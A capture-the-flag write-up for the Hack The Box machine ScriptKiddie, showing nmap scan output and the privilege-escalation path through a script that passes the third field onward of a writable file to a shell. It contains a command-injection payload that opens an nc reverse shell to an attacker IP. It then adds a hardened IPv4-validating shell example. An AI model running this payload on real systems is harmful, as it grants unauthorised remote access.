```
# Nmap 7.91 scan initiated Wed May 19 10:36:41 2021 as: nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 19 10:37:45 2021 -- 1 IP address (1 host up) scanned in 64.18 seconds
```
This time we can see that TCP port 5000 is open as well. Let's open it in the browser.
After modifying the exploit and uploading it, we get a reverse shell.
We find a script named scanloser.sh lying in the pwn user's home directory.
Here we can see that the script takes the contents of the hackers file and executes it.
Indeed, the hackers file is writable.
Soon enough, we understand that cut -d' ' -f3- drops the first two fields and keeps everything from the third field onward, splitting on the delimiter supplied to the command (here a single space).
We can craft a payload like this and append it to the hackers file:

```
echo "a a ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.4 4445 >/tmp/f;" >> hackers
```
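The root cause is that whatever sits in the third field onward of a writable file is handed straight to a shell. As an added example (not from this writeup and not the box's own scanloser.sh), this is how such a consumer should be hardened: take the same field, but refuse anything that is not a bare IPv4 address. Function names and the sample lines are hypothetical constructs.

```shell
# Added example, not from the writeup or the box's scanloser.sh: a hardened
# consumer of log lines whose third field onward is meant to be a target
# address. Function names are hypothetical. Runs with POSIX sh.

# Return 0 if $1 is a bare dotted-quad IPv4 address (octets 0-255), else 1.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1            # split on dots into positional parameters
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Take the third field onward exactly as the script does, but refuse anything
# that is not a single bare IPv4 address, so shell metacharacters never reach
# a command line. Prints the address on success, returns 1 otherwise.
extract_target() {
    target=$(printf '%s\n' "$1" | cut -d' ' -f3-)
    is_ipv4 "$target" || return 1
    printf '%s\n' "$target"
}

# Constructed sample lines (not real scanner output): one clean address, one
# out-of-range octet, one with an injected command, one with trailing junk.
SAMPLE='x y 10.10.16.4
x y 192.168.1.300
x y 10.10.16.4;id
x y 10.0.0.7 trailing'

# Print how many lines of $1 pass validation.
count_valid_targets() {
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        if extract_target "$line" >/dev/null; then n=$((n + 1)); fi
    done <<EOF
$1
EOF
    echo "$n"
}

count_valid_targets "$SAMPLE"   # prints 1
```

Only the first sample line survives; the injected command, the bad octet and the trailing junk are all rejected before anything is executed.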